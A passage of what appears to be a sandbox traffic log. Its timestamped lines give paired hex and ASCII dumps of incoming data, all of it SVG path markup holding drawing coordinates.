ass="cls-4" d="M875.41,203.05a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,
2023-03-22 04:45:55 UTC	1643	IN	Data Raw: 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 35 2e 38 32 2c 31 34 39 2e 33 36 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 Data Ascii: .36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M845.82,149.36a1.68,1.68,0,0,1,.76-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846
2023-03-22 04:45:55 UTC	1659	IN	Data Raw: 32 37 39 2e 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 36 33 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 Data Ascii: 279.8a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.63,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.8
2023-03-22 04:45:55 UTC	1675	IN	Data Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 39 2e 38 2c 32 32 36 2e 31 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c Data Ascii: 0,0,1-.16-2.81"/><path class="cls-4" d="M799.8,226.11a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,
2023-03-22 04:45:55 UTC	1691	IN	Data Raw: 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2e 32 35 2c 32 33 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c Data Ascii: ,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505.25,237a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,
2023-03-22 04:45:55 UTC	1707	IN	Data Raw: 30 37 2c 39 37 2e 32 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c Data Ascii: 07,97.27a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,
2023-03-22 04:45:55 UTC	1723	IN	Data Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 37 38 2c 31 36 35 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M557.78,165.66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,
2023-03-22 04:45:55 UTC	1739	IN	Data Raw: 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 37 35 2c 32 34 31 2e 37 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c Data Ascii: ,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M591.75,241.76a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path cl
2023-03-22 04:45:55 UTC	1771	IN	Data Raw: 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 35 37 2c 31 30 32 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 Data Ascii: -3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M610.57,102.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.9
2023-03-22 04:45:55 UTC	1787	IN	Data Raw: 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 35 34 2c 31 37 38 2e 31 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c Data Ascii: 7,0,0,1,.18,3.18"/><path class="cls-7" d="M644.54,178.17a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,
2023-03-22 04:45:55 UTC	1803	IN	Data Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 35 31 2c 32 35 34 2e 32 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 Data Ascii: ath class="cls-7" d="M678.51,254.28a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66
2023-03-22 04:45:55 UTC	1819	IN	Data Raw: 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 37 2e 30 37 2c 31 30 36 2e 38 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 Data Ascii: ,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M697.07,106.87a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2
2023-03-22 04:45:55 UTC	1835	IN	Data Raw: 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 31 2c 31 38 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 Data Ascii: -1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M731,183a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d
2023-03-22 04:45:55 UTC	1851	IN	Data Raw: 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 35 2c 32 35 39 2e 30 37 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 Data Ascii: 2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M765,259.07a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79
2023-03-22 04:45:55 UTC	1867	IN	Data Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 33 34 2c 32 36 38 2e 32 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.34,268.22a2.16,2.16,0,0,1-1.09,2.75,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
2023-03-22 04:45:55 UTC	1883	IN	Data Raw: 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 30 38 2c 33 32 39 2e 32 39 41 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2c 36 38 37 2c 33 33 32 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 Data Ascii: 1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M688.08,329.29A2.16,2.16,0,0,1,687,332a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d
2023-03-22 04:45:55 UTC	1899	IN	Data Raw: 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 31 2c 33 39 30 2e 33 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 Data Ascii: 0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M722.81,390.36a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.6
2023-03-22 04:45:55 UTC	1915	IN	Data Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 35 35 2c 34 35 31 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.55,451.44a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,
